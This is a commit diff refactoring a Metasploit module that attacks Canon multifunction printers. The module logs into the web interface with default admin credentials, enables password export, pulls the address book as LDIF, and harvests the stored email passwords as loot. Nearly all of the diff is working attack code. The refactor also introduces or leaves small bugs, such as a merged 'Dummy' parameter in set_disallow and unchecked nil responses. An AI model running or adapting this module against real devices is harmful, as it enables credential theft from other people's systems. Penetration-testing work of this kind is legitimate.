Cleanup canon_irav_pwd_extract module

Author: dmohanty-r7

modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb

@@ -1,14 +1,11 @@
 #
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'rex/proto/http'
 require 'msf/core'
 
-
-class Metasploit3 < Msf::Auxiliary
+class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
@@ -31,7 +28,9 @@ def initialize(info={})
       'Author'         =>
         [
           'Deral "Percentx" Heiland',
-          'Pete "Bokojan" Arzamendi'
+          'Pete "Bokojan" Arzamendi',
+          'William Vu',
+          'Dev Mohanty'
         ],
       'License'        => MSF_LICENSE
     ))
@@ -40,47 +39,47 @@ def initialize(info={})
       [
         OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", false]),
         OptInt.new('ADDRSBOOK', [ true, 'The number of the address book to extract 1-11', 1]),
-        OptInt.new('RPORT', [ true, 'The target port', 8000]),
+        Opt::RPORT(8000),
         OptString.new('USER', [ true, 'The default Admin user', '7654321']),
         OptString.new('PASSWD', [ true, 'The default Admin password', '7654321']),
         OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])
 
       ], self.class)
   end
 
-# Time to start the fun
   def run_host(ip)
     print_status("Attempting to extract passwords from the address books on the MFP at #{rhost}")
     login(ip)
   end
 
 #Authenticate to management function on Canon MFP and build needed cookies for dta harvesting
   def login(ip)
-    login_post_data = "uri=%2f&deptid=#{datastore['USER']}&password=#{datastore['PASSWD']}"
-
+    vars_post = {
+      "uri" => "%2f",
+      "deptid" => "#{datastore['USER']}",
+      "password" => "#{datastore['PASSWD']}"
+    }
     begin
       res = send_request_cgi({
         'method'  => 'POST',
-        'uri'     => '/login',
-        'data'    => login_post_data,
+        'uri'     => normalize_uri('/login'),
+        'vars_post' => vars_post
       }, datastore['TIMEOUT'].to_i)
     end
 
     #grab Canon sessionid cookie
-    idcookie = res.get_cookies
+    idcookie = res.nil? ? nil : res.get_cookies
 
-    if (res.code == 301 or res.code == 302 and res.headers['Location'] != nil)
+    if res.code == 301 || res.code == 302 && res.headers.include?('Location')
       print_good("#{rhost} - SUCCESSFUL login with USER='#{datastore['USER']}' : PASSWORD='#{datastore['PASSWD']}'")
 
-    #grab Canon IR= session cookie
-      begin
-        res = send_request_cgi({
-          'method'  => 'GET',
-          'uri'     => '/rps/nativetop.cgi?RUIPNxBundle=&CorePGTAG=PGTAG_CONF_ENV_PAP&Dummy=1400782981064',
-          'headers' => {'Cookie' => "#{idcookie}"},
-          }, datastore['TIMEOUT'].to_i)
-      end
-      ircookie = res.get_cookies
+      #grab Canon IR= session cookie
+      res = send_request_cgi({
+        'method'  => 'GET',
+        'uri'     => normalize_uri('/rps/nativetop.cgi?RUIPNxBundle=&CorePGTAG=PGTAG_CONF_ENV_PAP&Dummy=1400782981064'),
+        'headers' => {'Cookie' => "#{idcookie}"},
+      }, datastore['TIMEOUT'].to_i)
+      ircookie = res.nil? ? nil : res.get_cookies
       cookies=("#{idcookie}; #{ircookie}")
 
       set_allow(cookies)
@@ -93,32 +92,47 @@ def login(ip)
   end
 
 
-# Set the allow password export to on
+  # Set the allow password export to on
   def set_allow(cookies)
-  set_post_data = "ADRSEXPPSWDCHK=0&PageFlag=c_adrs.tpl&Flag=Exec_Data&CoreNXAction=./cadrs.cgi&CoreNXPage=c_adrexppass.tpl&CoreNXFlag=Init_Data&Dummy=1359048058115"
-
+    vars_post = {
+      "ADRSEXPPSWDCHK" => "0",
+      "PageFlag" => "c_adrs.tpl",
+      "Flag" => "Exec_Data",
+      "CoreNXAction" => "./cadrs.cgi",
+      "CoreNXPage" => "c_adrexppass.tpl",
+      "CoreNXFlag" => "Init_Data",
+      "Dummy" => "1359048058115"
+    }
     begin
       res = send_request_cgi({
         'method'  => 'POST',
-        'uri'     => '/rps/cadrs.cgi',
-        'data'    => set_post_data,
+        'uri'     => normalize_uri('/rps/cadrs.cgi'),
+        'vars_post' => vars_post,
         'headers' => {'Cookie' => "#{cookies}"},
       }, datastore['TIMEOUT'].to_i)
     end
   end
 
-# Extract the adress book data and save out to loot
+  # Extract the adress book data and save out to loot
   def extract(cookies, ip)
-    extract_data ="AID=#{datastore['ADDRSBOOK']}&ACLS=1&ENC_MODE=0&ENC_FILE=password&PASSWD=&PageFlag=&AMOD=&Dummy=1359047882596&ERR_PG_KIND_FLG=Adress_Export"
-    begin
-      res = send_request_cgi({
-        'method'  => 'POST',
-        'uri'     => '/rps/abook.ldif',
-        'data'    => extract_data,
-        'headers' => {'Cookie' => "#{cookies}"},
-      }, datastore['TIMEOUT'].to_i)
-    end
-    address_book = (res.body)
+    vars_post = {
+      "AID" => "#{datastore['ADDRSBOOK']}",
+      "ACLS" => "1",
+      "ENC_MODE" => "0",
+      "ENC_FILE" => "password",
+      "PASSWD" => "",
+      "PageFlag" => "",
+      "AMOD" => "",
+      "Dummy" => "1359047882596",
+      "ERR_PG_KIND_FLG" => "Adress_Export"
+    }
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri('/rps/abook.ldif'),
+      'vars_post' => vars_post,
+      'headers' => {'Cookie' => "#{cookies}"},
+    }, datastore['TIMEOUT'].to_i)
+    address_book = res.nil? ? nil : res.body
     print_status("#{address_book}")
 
     #Woot we got loot.
@@ -127,23 +141,27 @@ def extract(cookies, ip)
     loot_filename = "Canon-addressbook.text"
     loot_desc     = "Canon Addressbook Harvester"
     p = store_loot(loot_name, loot_type, datastore['RHOST'], address_book , loot_filename, loot_desc)
-    print_status("Credentials saved in: #{p.to_s}")
+    print_status("Credentials saved in: #{p}")
 
     harvest_ldif(address_book, ip)
   end
 
 # Reset the allow password export to off
   def set_disallow(cookies)
-    set_post_data = "ADRSEXPPSWDCHK=1&PageFlag=c_adrs.tpl&Flag=Exec_Data&CoreNXAction=./cadrs.cgi&CoreNXPage=c_adrexppass.tpl&CoreNXFlag=Init_Data&Dummy=1359048058115"
-
-    begin
-      res = send_request_cgi({
-        'method'  => 'POST',
-        'uri'     => '/rps/cadrs.cgi',
-        'data'    => set_post_data,
-        'headers' => {'Cookie' => "#{cookies}"},
-      }, datastore['TIMEOUT'].to_i)
-    end
+    vars_post = {
+      "ADRSEXPPSWDCHK" => "1",
+      "PageFlag" => "c_adrs.tpl",
+      "Flag" => "Exec_Data",
+      "CoreNXAction" => "./cadrs.cgi",
+      "CoreNXPage" => "c_adrexppass.tpl",
+      "CoreNXFlag" => "Init_Data&Dummy=1359048058115"
+    }
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri('/rps/cadrs.cgi'),
+      'vars_post' => vars_post,
+      'headers' => {'Cookie' => "#{cookies}"},
+    }, datastore['TIMEOUT'].to_i)
   end
 
   # Harvest Credential
@@ -152,7 +170,7 @@ def harvest_ldif(address_book, ip)
   end
 
   def harvest_credentials(mailaddress, pwd, ip)
-    return 0 if mailaddress == nil
+    return if mailaddress == nil
     username_domain = mailaddress.split('@')
     username = username_domain[0]
     domain = username_domain[1]
@@ -161,7 +179,7 @@ def harvest_credentials(mailaddress, pwd, ip)
         address: Rex::Socket.getaddress(ip),
         port: rport,
         protocol: 'tcp',
-        service_name: 'http',
+        service_name: ssl ? 'https' : 'http',
         workspace_id: myworkspace_id
     }
 
@@ -175,7 +193,7 @@ def harvest_credentials(mailaddress, pwd, ip)
 
     create_credential(credential_data.merge(service_data))
 
-    puts "Domain: #{domain}\nUser: #{username}\nPassword: #{pwd}\n\r"
+    print_good "Domain: #{domain}\nUser: #{username}\nPassword: #{pwd}\n\r"
   end
 
   def harvest_file(ldif, ip)